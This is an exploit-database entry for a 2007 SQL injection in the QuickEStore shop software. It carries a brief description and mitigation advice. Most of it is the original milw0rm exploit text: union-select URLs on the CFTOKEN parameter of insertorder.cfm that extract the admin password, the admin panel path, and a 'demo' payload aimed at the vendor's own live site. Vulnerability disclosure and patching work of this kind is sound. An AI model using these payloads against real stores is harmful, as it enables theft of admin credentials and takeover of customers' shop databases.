header-logo
Suggest Exploit
vendor:
QuickEStore
by:
meoconx[at]vnbrain.net
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: QuickEStore
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

SQL Injection in QuickEStore

The vulnerability allows an attacker to execute arbitrary SQL queries in the 'insertorder.cfm' page. By manipulating the 'CFID' and 'CFTOKEN' parameters, an attacker can retrieve sensitive information such as the admin password.

Mitigation:

To mitigate this vulnerability, input validation and parameterized queries should be implemented in the application code. Additionally, access controls should be enforced to limit the privileges of database users.
Source

Exploit-DB raw data:

author:meoconx[at]vnbrain.net
web application:QuickEStore
Main Page:www.quickestore.com
bug:

sql injection at insertorder.cfm?CFID=123&CFTOKEN=1'

exploit:

http://www.xxx.com/insertorder.cfm?CFID=123&CFTOKEN=1[sql query]

get admin password:
http://www.xxx.com/insertorder.cfm?CFID=123&CFTOKEN=1 union select 1,2,3,password,5,6,7,8,9,10,11,12 from params"having 1=1

link admin:http://www.xxx.com/admin/

demo(main site :D :D):
http://www.quickestore.com/ppec/insertorder.cfm?CFID=xx&CFTOKEN=1%20union%20select%201,2,3,4,password,6,7,8,9,10,11,12,13,14,15%20from%20params%22having%201=1

# milw0rm.com [2007-07-18]

Navigation

Suggest Exploit

Services By CQR